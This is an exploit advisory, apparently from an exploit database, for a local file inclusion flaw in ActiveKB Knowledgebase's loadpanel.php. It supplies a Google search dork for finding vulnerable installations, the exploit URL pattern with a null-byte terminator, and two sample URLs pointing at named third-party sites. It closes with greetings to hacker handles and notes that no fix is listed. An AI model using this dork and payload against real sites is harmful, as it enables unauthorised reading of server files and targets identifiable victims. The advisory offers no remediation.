ActiveKB Knowledgebase (loadpanel.php Panel) Local File Inclusion Vuln

2009-04-03 17:34:48

[o]------------------------------------------------------------------------------------[x]
| Local File Inclusion Vulnerability |
[o]------------------------------------------------------------------------------------[o]
| Software : ActiveKB Knowledgebase version X.X |
| Vendor : http://www.interspire.com/activekb/ |
| Date : 02 April 2009 |
| Author : Angela Chang |
| Contact : [email protected] |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

"Powered by ActiveKB Knowledgebase Software"
inurl:loadpanel.php?Panel=

[»] Vulnerable

./loadpanel.php

[»] Exploit

http://[site]/[path]/loadpanel.php?Panel=[LFI]%00

[»] Sample

http://help.theedweb.com/activekb/loadpanel.php?Panel=[LFI]%00
http://my.myriadnetwork.com/kb//loadpanel.php?Panel=[LFI]%00

[o]------------------------------------------------------------------------------------[x]
| Greetz : Speciale Thanks FoR : |
[o]------------------------------------------------------------------------------------[o]
| -------- Vrs-hCk , Nyubi (Solpot) , OoN_Boy ---------- |
[o]------------------------------------------------------------------------------------[o]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.